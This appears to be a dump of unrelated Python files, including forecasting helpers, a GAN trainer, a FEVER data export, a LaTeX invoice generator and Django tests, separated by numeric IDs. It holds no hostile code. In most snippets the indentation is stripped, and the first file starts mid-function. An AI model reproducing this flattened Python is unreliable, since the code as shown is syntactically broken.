dtf = files[fkey].param.df.groupby(grp_cols).apply(engroup, cols=grp_cols)
#print(dtf)
#print("~~~~~~~*********\nnested dtf")
#print_nested_df(dtf)
dtf.index = dtf.index.droplevel(len(grp_cols))
dtf = dtf.reset_index()
#print("******************\nnested dtf")
#print_nested_df(dtf)
param.df = param.df.merge(dtf)
#print("##################\nnested df")
#print_nested_df(param.df)
# add name only after saving the original config columns
param.df['name'] = param.df[cfg_cols].apply(lambda x: get_cfg_str(x), axis='columns')
param.df['parcfg'] = param.df[cfg_cols].apply(lambda x: get_cfg_str_unsrt(x), axis='columns')
#print_nested_df(param.df)
def substitute(arg, t):
if isinstance(arg, str):
if arg[0] == '$':
plist = t[arg[1:]]['path'].tolist()
return(plist[0] if len(plist) == 1 else plist)
elif arg[0] == '#':
if arg == '##':
return(t[cfg_cols_wo_spl])
else:
#print(kw['basename'])
#print(arg)
#print(t[arg[1:]])
return(t[arg[1:]])
else:
return(arg)
else:
return(arg)
for (j, t) in param.df.iterrows():
#print(t['parcfg'])
newkw = kw.copy()
newkw['name'] = t['name']
newkw['targets'] = [p for f in targets.keys() for p in get_file_paths(t, f)]
if inputs:
newkw['file_dep'] = [p for f in inputs.keys() for p in get_file_paths(t, f)]
            else:
                # if inputs are not defined, make the targets build only once
newkw['uptodate'] = [run_once]
if 'actions' not in newkw:
#get the name of the arguments of run
varnames = newkw['run'].__code__.co_varnames[1:] # first variable is 'self' which should be ignored
newkw['actions'] = [(newkw.pop('run'), [get_file_paths(t, v) for v in varnames])] # TODO: list as argument
else:
actions = []
# add one action to make sure that the target directory exists
# if not create one
for tgt_path in newkw['targets']:
actions += [(ensure_dir, [tgt_path], {})]
for action in newkw['actions']:
newargs = []
newactkws = {}
if isinstance(action, (list,tuple)):
if (len(action) > 2):
act, args, act_kw = action
else:
act, args = action
act_kw = {}
                    else:
                        act = action
                        args = []
                        act_kw = {}
for arg in args:
newargs.append(substitute(arg, t))
for act_key in act_kw:
newactkws[act_key] = substitute(act_kw[act_key], t)
if isinstance(act, str):
for i, v in enumerate(newargs):
if isinstance(v, list):
newargs[i] = ' '.join(v)
newact = act.format(*newargs)
newargs = []
else:
newact = act
actions += [(newact, newargs, newactkws) if len(newargs) + len(newactkws) else (newact)]
newkw['actions'] = actions
if show_details:
print("------------------")
for key, val in newkw.items():
print(key, "\t:", val)
yield newkw
|
158121
|
from bitmovin.errors import InvalidTypeError
from bitmovin.utils import Serializable
from bitmovin.resources.enums import S3SignatureVersion
from . import AbstractOutput
class GenericS3Output(AbstractOutput, Serializable):
def __init__(self, access_key, secret_key, bucket_name, host, port=None, signature_version=None, ssl=None, id_=None, custom_data=None,
name=None, description=None):
super().__init__(id_=id_, custom_data=custom_data, name=name, description=description)
self._signatureVersion = None
self.accessKey = access_key
self.secretKey = secret_key
self.bucketName = bucket_name
self.host = host
self.port = port
self.signatureVersion = signature_version
self.ssl = ssl
@property
def signatureVersion(self):
return self._signatureVersion
@signatureVersion.setter
def signatureVersion(self, new_sigver):
if new_sigver is None:
return
if isinstance(new_sigver, str):
self._signatureVersion = new_sigver
elif isinstance(new_sigver, S3SignatureVersion):
self._signatureVersion = new_sigver.value
else:
            raise InvalidTypeError(
                'Invalid type {} for signatureVersion: must be either str or S3SignatureVersion!'.format(type(new_sigver)))
@classmethod
def parse_from_json_object(cls, json_object):
id_ = json_object['id']
bucket_name = json_object['bucketName']
access_key = json_object.get('accessKey')
secret_key = json_object.get('secretKey')
name = json_object.get('name')
description = json_object.get('description')
host = json_object.get('host')
port = json_object.get('port')
signature_version = json_object.get('signatureVersion')
ssl = json_object.get('ssl')
generic_s3_output = GenericS3Output(
access_key=access_key, secret_key=secret_key, bucket_name=bucket_name, host=host, port=port, signature_version=signature_version,
ssl=ssl, id_=id_, name=name, description=description)
return generic_s3_output
def serialize(self):
serialized = super().serialize()
serialized['signatureVersion'] = self.signatureVersion
return serialized
|
158179
|
from copy import copy
from typing import Union
import numpy as np
from fedot.core.data.data import InputData, OutputData
from fedot.core.data.multi_modal import MultiModalData
from fedot.core.operations.evaluation.operation_implementations.data_operations.ts_transformations import ts_to_table
from fedot.core.repository.dataset_types import DataTypesEnum
from fedot.core.repository.tasks import TaskTypesEnum
def out_of_sample_ts_forecast(pipeline, input_data: InputData,
horizon: int = None) -> np.array:
"""
    Make an out-of-sample forecast of the requested length. The previously
    predicted parts of the time series are used as history for forecasting the
    next parts. Available only for the time series forecasting task. Steps
    ahead are produced iteratively.
time series ----------------|
forecast |---|---|---|
:param pipeline: Pipeline for making time series forecasting
:param input_data: data for prediction
:param horizon: forecasting horizon
:return final_forecast: array with forecast
"""
# Prepare data for time series forecasting
task = input_data.task
exception_if_not_ts_task(task)
if isinstance(input_data, InputData):
pre_history_ts = np.array(input_data.features)
        # How many elements into the future the pipeline can produce
        scope_len = task.task_params.forecast_length
        number_of_iterations = _calculate_number_of_steps(scope_len, horizon)
        # Make forecast iteratively moving through the horizon
final_forecast = []
for _ in range(0, number_of_iterations):
iter_predict = pipeline.root_node.predict(input_data=input_data)
iter_predict = np.ravel(np.array(iter_predict.predict))
final_forecast.append(iter_predict)
# Add prediction to the historical data - update it
pre_history_ts = np.hstack((pre_history_ts, iter_predict))
# Prepare InputData for next iteration
input_data = _update_input(pre_history_ts, scope_len, task)
elif isinstance(input_data, MultiModalData):
data = MultiModalData()
for data_id in input_data.keys():
features = input_data[data_id].features
pre_history_ts = np.array(features)
source_len = len(pre_history_ts)
            # How many elements into the future the pipeline can produce
            scope_len = task.task_params.forecast_length
            number_of_iterations = _calculate_number_of_steps(scope_len, horizon)
            # Make forecast iteratively moving through the horizon
final_forecast = []
for _ in range(0, number_of_iterations):
iter_predict = pipeline.predict(input_data=input_data)
iter_predict = np.ravel(np.array(iter_predict.predict))
final_forecast.append(iter_predict)
# Add prediction to the historical data - update it
pre_history_ts = np.hstack((pre_history_ts, iter_predict))
# Prepare InputData for next iteration
input_data = _update_input(pre_history_ts, scope_len, task)
# Create output data
final_forecast = np.ravel(np.array(final_forecast))
# Clip the forecast if it is necessary
final_forecast = final_forecast[:horizon]
return final_forecast
def in_sample_ts_forecast(pipeline, input_data: Union[InputData, MultiModalData],
horizon: int = None) -> np.array:
"""
    Make an in-sample forecast. The actual values of the time series, rather
    than the previously predicted parts, are used as history for forecasting
    the next parts.
time series ----------------|---|---|---|
forecast |---|---|---|
:param pipeline: Pipeline for making time series forecasting
:param input_data: data for prediction
:param horizon: forecasting horizon
:return final_forecast: array with forecast
"""
# Divide data on samples into pre-history and validation part
task = input_data.task
exception_if_not_ts_task(task)
if isinstance(input_data, InputData):
time_series = np.array(input_data.features)
pre_history_ts = time_series[:-horizon]
source_len = len(pre_history_ts)
last_index_pre_history = source_len - 1
        # How many elements into the future the pipeline can produce
scope_len = task.task_params.forecast_length
number_of_iterations = _calculate_number_of_steps(scope_len, horizon)
# Calculate intervals
intervals = _calculate_intervals(last_index_pre_history,
number_of_iterations,
scope_len)
data = _update_input(pre_history_ts, scope_len, task)
else:
# TODO simplify
data = MultiModalData()
for data_id in input_data.keys():
features = input_data[data_id].features
time_series = np.array(features)
pre_history_ts = time_series[:-horizon]
source_len = len(pre_history_ts)
last_index_pre_history = source_len - 1
            # How many elements into the future the pipeline can produce
scope_len = task.task_params.forecast_length
number_of_iterations = _calculate_number_of_steps(scope_len, horizon)
# Calculate intervals
intervals = _calculate_intervals(last_index_pre_history,
number_of_iterations,
scope_len)
local_data = _update_input(pre_history_ts, scope_len, task)
data[data_id] = local_data
    # Make forecast iteratively moving through the horizon
final_forecast = []
for _, border in zip(range(0, number_of_iterations), intervals):
iter_predict = pipeline.predict(input_data=data)
iter_predict = np.ravel(np.array(iter_predict.predict))
final_forecast.append(iter_predict)
if isinstance(input_data, InputData):
# Add actual values to the historical data - update it
pre_history_ts = time_series[:border + 1]
# Prepare InputData for next iteration
data = _update_input(pre_history_ts, scope_len, task)
else:
# TODO simplify
data = MultiModalData()
for data_id in input_data.keys():
features = input_data[data_id].features
time_series = np.array(features)
pre_history_ts = time_series[:border + 1]
local_data = _update_input(pre_history_ts, scope_len, task)
data[data_id] = local_data
# Create output data
final_forecast = np.ravel(np.array(final_forecast))
# Clip the forecast if it is necessary
final_forecast = final_forecast[:horizon]
return final_forecast
def fitted_values(train_predicted: OutputData, horizon_step: int = None) -> OutputData:
""" The method converts a multidimensional lagged array into an
one-dimensional array - time series based on predicted values for training sample
:param train_predicted: OutputData
:param horizon_step: index of elements for forecast. If None - perform
averaging for all forecasting steps
"""
copied_data = copy(train_predicted)
if horizon_step is not None:
# Take particular forecast step
copied_data.predict = copied_data.predict[:, horizon_step]
copied_data.idx = copied_data.idx + horizon_step
return copied_data
else:
# Perform collapse with averaging
forecast_length = copied_data.task.task_params.forecast_length
# Extend source index range
indices_range = np.arange(copied_data.idx[0], copied_data.idx[-1] + forecast_length + 1)
# Lagged matrix with indices in cells
_, idx_matrix = ts_to_table(idx=indices_range,
time_series=indices_range,
window_size=forecast_length)
predicted_matrix = copied_data.predict
# For every index calculate mean predictions (by all forecast steps)
final_predictions = []
indices_range = indices_range[:-1]
for index in indices_range:
vals = predicted_matrix[idx_matrix == index]
mean_value = np.mean(vals)
final_predictions.append(mean_value)
copied_data.predict = np.array(final_predictions)
copied_data.idx = indices_range
return copied_data
def in_sample_fitted_values(train_predicted: OutputData) -> OutputData:
""" Perform in sample validation based on training sample """
forecast_length = train_predicted.task.task_params.forecast_length
all_values = []
step = 0
    # Glue together parts of predictions in an "in-sample" way
while step < len(train_predicted.predict):
all_values.extend(train_predicted.predict[step, :])
step += forecast_length
# In some cases it doesn't reach the end
if not np.isclose(all_values[-1], train_predicted.predict[-1, -1]):
missing_part_index = step - len(train_predicted.predict) + 1
# Store missing predicted values
all_values.extend(train_predicted.predict[-1, missing_part_index:])
copied_data = copy(train_predicted)
copied_data.predict = np.array(all_values)
# Update indices
first_id = copied_data.idx[0]
copied_data.idx = np.arange(first_id, first_id + len(all_values))
return copied_data
def _calculate_number_of_steps(scope_len, horizon):
""" Method return amount of iterations which must be done for multistep
time series forecasting
:param scope_len: time series forecasting length
:param horizon: forecast horizon
:return amount_of_steps: amount of steps to produce
"""
amount_of_iterations = int(horizon // scope_len)
# Remainder of the division
resid = int(horizon % scope_len)
if resid == 0:
amount_of_steps = amount_of_iterations
else:
amount_of_steps = amount_of_iterations + 1
return amount_of_steps
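# Quick check of the step arithmetic (hypothetical values): with a pipeline
# producing 3 elements per call and a horizon of 10, 10 // 3 = 3 full steps
# plus one partial step for the remainder:
#
#     _calculate_number_of_steps(scope_len=3, horizon=10)  # -> 4
#     _calculate_number_of_steps(scope_len=5, horizon=10)  # -> 2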
def _update_input(pre_history_ts, scope_len, task):
""" Method make new InputData object based on the previous part of time
series
:param pre_history_ts: time series
    :param scope_len: how many elements into the future the algorithm can forecast
:param task: time series forecasting task
:return input_data: updated InputData
"""
start_forecast = len(pre_history_ts)
end_forecast = start_forecast + scope_len
input_data = InputData(idx=np.arange(start_forecast, end_forecast),
features=pre_history_ts, target=None,
task=task, data_type=DataTypesEnum.ts)
return input_data
def _calculate_intervals(last_index_pre_history, amount_of_iterations, scope_len):
""" Function calculate
:param last_index_pre_history: last id of the known part of time series
:param amount_of_iterations: amount of steps for time series forecasting
:param scope_len: amount of elements in every time series forecasting step
:return intervals: ids of finish of every step in time series
"""
intervals = []
current_border = last_index_pre_history
for i in range(0, amount_of_iterations):
current_border = current_border + scope_len
intervals.append(current_border)
return intervals
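# For example, with last_index_pre_history=99, amount_of_iterations=3 and
# scope_len=5 the computed borders are [104, 109, 114].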
def exception_if_not_ts_task(task):
if task.task_type != TaskTypesEnum.ts_forecasting:
        raise ValueError('Forecasting is available only for the time series forecasting task')
|
158181
|
from PhysicsTools.Heppy.analyzers.objects.JetAnalyzer import JetAnalyzer
from PhysicsTools.Heppy.analyzers.objects.LeptonAnalyzer import LeptonAnalyzer
from PhysicsTools.Heppy.analyzers.objects.METAnalyzer import METAnalyzer
from PhysicsTools.Heppy.analyzers.objects.PhotonAnalyzer import PhotonAnalyzer
from PhysicsTools.Heppy.analyzers.objects.TauAnalyzer import TauAnalyzer
from PhysicsTools.Heppy.analyzers.objects.IsoTrackAnalyzer import IsoTrackAnalyzer
from PhysicsTools.Heppy.analyzers.objects.VertexAnalyzer import VertexAnalyzer
|
158182
|
def aio_documented_by(original):
def wrapper(target):
target.__doc__ = "Aio function: {original_doc}".format(original_doc=original.__doc__)
return target
return wrapper
def documented_by(original):
def wrapper(target):
target.__doc__ = original.__doc__
return target
return wrapper
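# Usage sketch (illustrative names): copy a synchronous function's docstring
# onto its async counterpart so help() output stays consistent.
#
#     def fetch(url):
#         """Fetch a URL synchronously."""
#
#     @aio_documented_by(fetch)
#     async def aio_fetch(url):
#         ...
#
#     # aio_fetch.__doc__ == 'Aio function: Fetch a URL synchronously.'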
|
158209
|
import os
def delete_old_logs():
log_path = "logs"
error = False
for root, dirs, files in os.walk(log_path):
for file in files:
path = os.path.join(root, file)
            try:
                os.remove(path)
            except Exception as e:
                error = True
                print("Could not delete file: " + path)
                print(str(e))
    if error:
        print("Logs deleted, but there were some errors")
    else:
        print("All logs were deleted successfully")
if __name__ == '__main__':
delete_old_logs()
|
158266
|
import numpy as np
import matplotlib.pyplot as plt
x = np.linspace(-1, 1, 50)
y = np.cos(np.linspace(0, 0.5 * np.pi, 50))  # 50 samples, matching x
plt.title("curve")
plt.grid()
plt.xlim(-1, 1)
plt.ylim(-1.05, +1.05)
plt.plot(x, y)
plt.show()
|
158336
|
from ndfinance.brokers.backtest import *
from ndfinance.core import BacktestEngine
from ndfinance.analysis.backtest.analyzer import BacktestAnalyzer
from ndfinance.analysis.technical import RateOfChange
from ndfinance.visualizers.backtest_visualizer import BasicVisualizer
from ndfinance.strategies.trend import ActualMomentumStratagy
from ndfinance.callbacks import PositionWeightPrinterCallback
from ndfinance import reporters
import matplotlib.pyplot as plt
import FinanceDataReader as fdr
def main(tickers, name="NAME", n=200, momentum_threshold=1, rebalance_period=TimeFrames.day * 28):
dp = BacktestDataProvider()
dp.add_yf_tickers(*tickers)
dp.add_technical_indicators(tickers, [TimeFrames.day], [RateOfChange(n)])
indexer = TimeIndexer(dp.get_longest_timestamp_seq())
dp.set_indexer(indexer)
brk = BacktestBroker(dp, initial_margin=10000)
[brk.add_asset(Asset(ticker=ticker)) for ticker in tickers]
strategy = ActualMomentumStratagy(
momentum_threshold=momentum_threshold,
rebalance_period=rebalance_period,
momentum_label=f"ROCR{n}",
)
engine = BacktestEngine()
engine.register_broker(brk)
engine.register_strategy(strategy)
log = engine.run()
reporters.make_html(log, "^IXIC", output=f"{name}_dualmomentum.html")
if __name__ == '__main__':
main([
"AAPL",
"FB",
"NFLX",
"GOOGL",
"NVDA",
"TSLA",
"AMZN",
"TWTR",
"BIDU",
"BABA"
], name="FANG+")
|
158371
|
def Qklnu(cfg, k, l, nu):  # function q=Qklnu(k,l,nu)
    #
    # Computes Q, a necessary constant for the moments computation.
    #
aux_1=cfg.power(-1,k+nu)/cfg.power(4.0,k) #aux_1=power(-1,k+nu)/power(4,k)
aux_2=cfg.sqrt((2*l+4*k+3)/3.0) #aux_2=sqrt((2*l+4*k+3)/3)
aux_3=cfg.trinomial(nu,k-nu,l+nu+1)*cfg.nchoosek(2*(l+nu+1+k),l+nu+1+k) #aux_3=trinomial(nu,k-nu,l+nu+1)*nchoosek(2*(l+nu+1+k),l+nu+1+k)
aux_4=cfg.nchoosek(2.0*(l+nu+1),l+nu+1) #aux_4=nchoosek(2*(l+nu+1),l+nu+1)
q=(aux_1*aux_2*aux_3)/aux_4 #q=(aux_1*aux_2*aux_3)/aux_4
return q
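# In math notation, the value computed above is (reconstructed from the code):
#   Q_{k,l,nu} = (-1)^(k+nu) / 4^k
#              * sqrt((2l + 4k + 3) / 3)
#              * trinomial(nu, k-nu, l+nu+1) * C(2(l+nu+1+k), l+nu+1+k)
#              / C(2(l+nu+1), l+nu+1)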
|
158376
|
from src.stores.amazon import *
class AmazonSimulation:
@staticmethod
def test(url):
page = get_page(url)
text = page.text
content = page.content
tree = html.fromstring(content)
price = get_price(tree)
mpn = get_mpn(text)
print(price)
print(mpn)
@staticmethod
def run_test():
# Should work
# url = 'https://www.amazon.com/Crucial-MX500-NAND-SATA-Internal/dp/B077SF8KMG'
#
# Should work
# url = 'https://www.amazon.com/gp/product/B073TQKNF2/'
#
# Should work
# url = 'https://www.amazon.com/RIPJAWS-KM570-Cherry-Speed-Silver/dp/B01LZEVDKI/'
#
# Should work
# url = 'https://www.amazon.com/Kingston-120GB-Solid-SA400S37-120G/dp/B01N6JQS8C/ref=mp_s_a_1_6?ie=UTF8&qid=1528906162&sr=8-6&pi=AC_SX236_SY340_QL65&keywords=ssd&dpPl=1&dpID=41EjY-AhQUL&ref=plSrch'
#
# Should work
# url = 'https://www.amazon.com/TP-Link-RangeBoost-Technology-Archer-A2300/dp/B0751RK6XZ/ref=sr_1_1?m=A3C0IBSA2XBL9N&s=merchant-items&ie=UTF8&qid=1528439208&sr=1-1&refinements=p_4%3ATP-Link&dpID=51LmWDKvBnL&preST=_SX300_QL70_&dpSrc=srch'
#
# Should fail
# url = 'https://www.amazon.com/Home-Audio-Electronics/b/ref=nav_shopall_hat?ie=UTF8&node=667846011'
#
# AmazonSimulation.test(url)
pass
if __name__ == '__main__':
AmazonSimulation.run_test()
|
158390
|
import torch
import torchvision
import os
from torch import optim
from torch.autograd import Variable
from model import Discriminator
from model import Generator
class Solver(object):
def __init__(self, config, data_loader):
self.generator = None
self.discriminator = None
self.g_optimizer = None
self.d_optimizer = None
self.g_conv_dim = config.g_conv_dim
self.d_conv_dim = config.d_conv_dim
self.z_dim = config.z_dim
self.beta1 = config.beta1
self.beta2 = config.beta2
self.image_size = config.image_size
self.data_loader = data_loader
self.num_epochs = config.num_epochs
self.batch_size = config.batch_size
self.sample_size = config.sample_size
self.lr = config.lr
self.log_step = config.log_step
self.sample_step = config.sample_step
self.sample_path = config.sample_path
self.model_path = config.model_path
self.build_model()
def build_model(self):
"""Build generator and discriminator."""
self.generator = Generator(z_dim=self.z_dim,
image_size=self.image_size,
conv_dim=self.g_conv_dim)
self.discriminator = Discriminator(image_size=self.image_size,
conv_dim=self.d_conv_dim)
self.g_optimizer = optim.Adam(self.generator.parameters(),
self.lr, [self.beta1, self.beta2])
self.d_optimizer = optim.Adam(self.discriminator.parameters(),
self.lr, [self.beta1, self.beta2])
if torch.cuda.is_available():
self.generator.cuda()
self.discriminator.cuda()
def to_variable(self, x):
"""Convert tensor to variable."""
if torch.cuda.is_available():
x = x.cuda()
return Variable(x)
def to_data(self, x):
"""Convert variable to tensor."""
if torch.cuda.is_available():
x = x.cpu()
return x.data
def reset_grad(self):
"""Zero the gradient buffers."""
self.discriminator.zero_grad()
self.generator.zero_grad()
def denorm(self, x):
"""Convert range (-1, 1) to (0, 1)"""
out = (x + 1) / 2
return out.clamp(0, 1)
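    # e.g. a tanh output of -1.0 maps to 0.0 and +1.0 maps to 1.0, so the
    # clamp keeps saved samples in the displayable [0, 1] range.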
def train(self):
"""Train generator and discriminator."""
fixed_noise = self.to_variable(torch.randn(self.batch_size, self.z_dim))
total_step = len(self.data_loader)
for epoch in range(self.num_epochs):
for i, images in enumerate(self.data_loader):
#===================== Train D =====================#
images = self.to_variable(images)
batch_size = images.size(0)
noise = self.to_variable(torch.randn(batch_size, self.z_dim))
# Train D to recognize real images as real.
outputs = self.discriminator(images)
real_loss = torch.mean((outputs - 1) ** 2) # L2 loss instead of Binary cross entropy loss (this is optional for stable training)
# Train D to recognize fake images as fake.
fake_images = self.generator(noise)
outputs = self.discriminator(fake_images)
fake_loss = torch.mean(outputs ** 2)
# Backprop + optimize
d_loss = real_loss + fake_loss
self.reset_grad()
d_loss.backward()
self.d_optimizer.step()
#===================== Train G =====================#
noise = self.to_variable(torch.randn(batch_size, self.z_dim))
# Train G so that D recognizes G(z) as real.
fake_images = self.generator(noise)
outputs = self.discriminator(fake_images)
g_loss = torch.mean((outputs - 1) ** 2)
# Backprop + optimize
self.reset_grad()
g_loss.backward()
self.g_optimizer.step()
# print the log info
if (i+1) % self.log_step == 0:
print('Epoch [%d/%d], Step[%d/%d], d_real_loss: %.4f, '
'd_fake_loss: %.4f, g_loss: %.4f'
%(epoch+1, self.num_epochs, i+1, total_step,
real_loss.data[0], fake_loss.data[0], g_loss.data[0]))
# save the sampled images
if (i+1) % self.sample_step == 0:
fake_images = self.generator(fixed_noise)
torchvision.utils.save_image(self.denorm(fake_images.data),
os.path.join(self.sample_path,
'fake_samples-%d-%d.png' %(epoch+1, i+1)))
# save the model parameters for each epoch
g_path = os.path.join(self.model_path, 'generator-%d.pkl' %(epoch+1))
d_path = os.path.join(self.model_path, 'discriminator-%d.pkl' %(epoch+1))
torch.save(self.generator.state_dict(), g_path)
torch.save(self.discriminator.state_dict(), d_path)
def sample(self):
# Load trained parameters
g_path = os.path.join(self.model_path, 'generator-%d.pkl' %(self.num_epochs))
d_path = os.path.join(self.model_path, 'discriminator-%d.pkl' %(self.num_epochs))
self.generator.load_state_dict(torch.load(g_path))
self.discriminator.load_state_dict(torch.load(d_path))
self.generator.eval()
self.discriminator.eval()
# Sample the images
noise = self.to_variable(torch.randn(self.sample_size, self.z_dim))
fake_images = self.generator(noise)
sample_path = os.path.join(self.sample_path, 'fake_samples-final.png')
torchvision.utils.save_image(self.denorm(fake_images.data), sample_path, nrow=12)
print("Saved sampled images to '%s'" %sample_path)
|
158392
|
import json
import random
from collections import defaultdict
import heapq
import pymysql.cursors
import os
# Connect to the database
import sys
connection = pymysql.connect(host=os.getenv("DB_HOST", "localhost"),
user=os.getenv("DB_USER", "root"),
password=os.getenv("DB_PASS", ""),
db=os.getenv("DB_SCHEMA", "fever"),
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
def evidence(claim_id):
cl_support = [ev for ev in claim_evidence[claim_id] if ev["label"] == "SUPPORTS" ]
cl_refutes = [ev for ev in claim_evidence[claim_id] if ev["label"] == "REFUTES" ]
cl_notenough = [ev for ev in claim_evidence[claim_id] if ev["verifiable"] == "NOT ENOUGH INFO"]
return cl_support,cl_refutes,cl_notenough
claim_evidence = defaultdict(lambda: [])
try:
with connection.cursor() as cursor:
sql = """
select claim.id, claim.text,
CASE
WHEN annotation.verifiable =1 THEN 'VERIFIABLE'
WHEN annotation.verifiable =2 THEN 'NOT ENOUGH INFO'
WHEN annotation.verifiable =3 THEN 'NOT VERIFIABLE'
WHEN annotation.verifiable =4 THEN 'TYPO'
END as verifiable,
CASE
WHEN verdict=1 THEN 'SUPPORTS'
WHEN verdict=2 THEN 'REFUTES'
END as label, sentence.entity_id as entity, annotation.id as aid, annotation_verdict.id as vid, verdict_line.page, verdict_line.line_number, testing, isOracle,isReval, isTestMode,isOracleMaster,isDiscounted from annotation
inner join claim on annotation.claim_id = claim.id
left join annotation_verdict on annotation.id = annotation_verdict.annotation_id
left join verdict_line on annotation_verdict.id = verdict_line.verdict_id
inner join sentence on claim.sentence_id = sentence.id
where isForReportingOnly = 0 and isTestMode = 0 and testing= 0
"""
cursor.execute(sql)
result = cursor.fetchall()
for res in result:
claim_evidence[res['id']].append(res)
finally:
connection.close()
def process(ids):
data = []
print(len(ids))
for id in ids:
cl0 = claim_evidence[id][0]
support_evidence, refute_evidence, not_enough_info_evidence = evidence(id)
if len(set([ev["aid"] for ev in support_evidence])) > len(set([ev["aid"] for ev in not_enough_info_evidence])):
not_enough_info_evidence = []
if len(set([ev["aid"] for ev in refute_evidence])) > len(set([ev["aid"] for ev in not_enough_info_evidence])):
not_enough_info_evidence = []
if len(set([ev["aid"] for ev in refute_evidence])) < len(set([ev["aid"] for ev in not_enough_info_evidence])):
support_evidence = []
if len(set([ev["aid"] for ev in refute_evidence])) < len(set([ev["aid"] for ev in not_enough_info_evidence])):
refute_evidence = []
s_s = defaultdict(lambda:[])
s_r = defaultdict(lambda:[])
s_nei = defaultdict(lambda:[])
for e in support_evidence:
s_s[e['vid']].append((e['aid'],e['vid'],e['page'],e['line_number']))
for e in refute_evidence:
s_r[e['vid']].append((e['aid'],e['vid'],e['page'],e['line_number']))
for e in not_enough_info_evidence:
s_nei[e['vid']].append((e['aid'],e['vid'],e['page'],e['line_number']))
if len(support_evidence):
data.append({"id":id, "verifiable":"VERIFIABLE", "label":"SUPPORTS","claim":cl0['text'],"evidence":list(s_s.values())})
if len(refute_evidence):
data.append({"id": id, "verifiable":"VERIFIABLE", "label": "REFUTES", "claim": cl0['text'], "evidence":list(s_r.values())})
if len(not_enough_info_evidence):
data.append({"id": id, "verifiable":"NOT ENOUGH INFO", "label": None, "claim": cl0['text'], "evidence":list(s_nei.values())})
return data
cnt=0
with open("train.ids.json", "r") as f:
train_ids = json.load(f)
print(train_ids[:10])
train = process(train_ids)
with open("dev.ids.json", "r") as f:
dev_ids = json.load(f)
print(dev_ids[:10])
dev = process(dev_ids)
with open("test.ids.json", "r") as f:
test_ids = json.load(f)
print(test_ids[:10])
test = process(test_ids)
with open("train.jsonl","w+") as f:
for line in train:
f.write(json.dumps(line)+"\n")
with open("dev.jsonl","w+") as f:
for line in dev:
f.write(json.dumps(line)+"\n")
with open("test.jsonl","w+") as f:
for line in test:
f.write(json.dumps(line)+"\n")
print(len(train),len(dev),len(test))
|
158429
|
from logging import addLevelName
from multiprocessing import Event
# Our custom log severity. We need this because we want to see some special messages and on node the default log level
# of workers is set to WARNING (INFO would be too much noise). These messages are not errors nor warnings, but can help
# in some situations (e.g. tracing tasks).
IMPORTANT = 35
addLevelName(IMPORTANT, 'IMPORTANT')
# Queue events
E_SHUTDOWN = Event()
# Task queues
Q_FAST = 'fast'
Q_SLOW = 'slow'
Q_MGMT = 'mgmt'
Q_BACKUP = 'backup'
Q_IMAGE = 'image'
# Task types
TT_DUMMY = 'd'
TT_EXEC = 'e'
TT_AUTO = 'a'
TT_MGMT = 'm'
TT_INTERNAL = 'i'
TT_ERROR = 'f'
TT = (TT_DUMMY, TT_EXEC, TT_AUTO, TT_MGMT, TT_INTERNAL, TT_ERROR)
# Task groups
TG_DC_BOUND = 'd'
TG_DC_UNBOUND = 'u'
TG = (TG_DC_BOUND, TG_DC_UNBOUND)
|
158441
|
from invoicing.latex.latex_templating import LatexTemplating
class LatexInvoice(LatexTemplating):
def generate(self, reference_code, company_name, company_address, created_at, total_cost, jobs):
template = self.latex_jinja_env.get_template('templates/Invoice.example.tex')
if len(jobs) == 0:
jobs.append({
'title': '-',
'description': '-',
'type': '-',
'actual_time': '-',
'staff_rate': '-',
'cost': '-'
})
tex = template.render(
reference_code=self.tex_escape(reference_code),
company_name=self.tex_escape(company_name),
company_address=self.tex_escape(company_address),
date=self.tex_escape(created_at),
total_cost=self.tex_escape(total_cost),
            jobs=[{k: self.tex_escape(v) for k, v in job.items()} for job in jobs]
)
file_name = reference_code + " " + company_name
self.create_tex_file(tex, file_name)
self.create_pdf(file_name)
if __name__ == '__main__':
LatexInvoice().generate(
'I-7001',
'Widget Corp',
'100 Some street, A city, A town, BO41 0PN',
'14/10/2018',
'$160',
[{
'title': 'Job 1',
'description': 'Do something',
'type': 'service',
'actual_time': '4h',
'staff_rate': '$40',
'cost': '$160'
}]
)
|
158453
|
from django.test import TestCase
from mock import patch
from digest.management.commands.import_importpython import ImportPythonParser
from digest.utils import MockResponse, read_fixture
class ImportPythonWeeklyTest(TestCase):
def setUp(self):
self.url = "http://importpython.com/newsletter/no/60/"
test_fixture = 'fixture_test_import_importpython_test_get_blocks.txt'
self.patcher = patch(
'digest.management.commands.import_importpython.urlopen')
self.urlopen_mock = self.patcher.start()
self.urlopen_mock.return_value = MockResponse(
read_fixture(test_fixture))
self.parser = ImportPythonParser()
def tearDown(self):
self.patcher.stop()
def test_correctly_creates_issue_urls(self):
self.assertEqual(ImportPythonParser.get_issue_url(2),
"http://importpython.com/static/files/issue2.html")
self.assertEqual(ImportPythonParser.get_issue_url(12),
"http://importpython.com/newsletter/draft/12")
self.assertEqual(ImportPythonParser.get_issue_url(56),
"http://importpython.com/newsletter/no/56")
with self.assertRaises(ValueError):
ImportPythonParser.get_issue_url(-100)
def test_correct_number_of_blocks_parsed(self):
blocks = self.parser.get_blocks(self.url)
self.assertEqual(len(blocks), 25)
def test_correctly_parses_block(self):
blocks = self.parser.get_blocks(self.url)
block = blocks[0]
self.assertEqual(block['link'],
"https://talkpython.fm/episodes/show/44/project-jupyter-and-ipython")
self.assertEqual(block['title'],
"Project Jupyter and IPython Podcast Interview")
self.assertEqual(block['content'],
"One of the fastest growing areas in Python is scientific computing. In scientific computing with Python, there are a few key packages that make it special. These include NumPy / SciPy / and related packages. The one that brings it all together, visually, is IPython (now known as Project Jupyter). That's the topic on episode 44 of Talk Python To Me. ")
def test_correctly_gets_latest_url(self):
test_latest = 'fixture_test_import_importpython_test_get_latest_url.txt'
self._old_return_value = self.urlopen_mock.return_value
self.urlopen_mock.return_value = MockResponse(read_fixture(test_latest))
latest_url = self.parser.get_latest_issue_url()
self.assertEqual(latest_url,
"http://importpython.com/newsletter/no/72/")
|
158463
|
import os
import random
from collections import defaultdict
import boto3
import pytest
from xoto3.dynamodb.update import versioned_diffed_update_item
from xoto3.dynamodb.utils.expressions import add_variables_to_expression
from xoto3.dynamodb.utils.table import extract_key_from_item, table_primary_keys
_TEST_TABLE_NAME = os.environ.get("XOTO3_TEST_DYNAMODB_TABLE_NAME", "")
def test_add_variables_to_expression():
variables = dict(deletedAt="2020-01-01T00:00:00.000000Z", do_a_thing="okay")
query_dict = add_variables_to_expression(dict(), variables)
assert query_dict["ExpressionAttributeNames"] == {
"#deletedAt": "deletedAt",
"#do_a_thing": "do_a_thing",
}
